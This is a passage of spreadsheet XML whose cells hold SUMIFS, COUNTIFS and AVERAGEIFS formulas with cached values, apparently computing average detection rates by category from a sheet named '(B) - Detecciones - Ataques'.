        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.3763157895</v>
      </c>
      <c r="V161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W161" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Y161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Z161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.2417624945</v>
      </c>
      <c r="AA161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.2307692308</v>
      </c>
      <c r="AB161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.25</v>
      </c>
      <c r="AC161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="AD161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE161" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="AF161" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG161" s="271"/>
      <c r="AH161" s="352" t="s">
        <v>2585</v>
      </c>
      <c r="AI161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AJ161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3526315789</v>
      </c>
      <c r="AR161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY161" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB161" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="BD161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="BN161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="BO161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="BZ161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA161" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC161" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="CI161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CQ161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH161" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI161" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ161" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK161" s="271"/>
    </row>
    <row r="162">
      <c r="J162" s="277"/>
      <c r="K162" s="512"/>
      <c r="L162" s="512"/>
      <c r="M162" s="512"/>
      <c r="N162" s="512"/>
      <c r="O162" s="278"/>
      <c r="Q162" s="271"/>
      <c r="R162" s="352" t="s">
        <v>2586</v>
      </c>
      <c r="S162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1685275081</v>
      </c>
      <c r="T162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.3789473684</v>
      </c>
      <c r="V162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
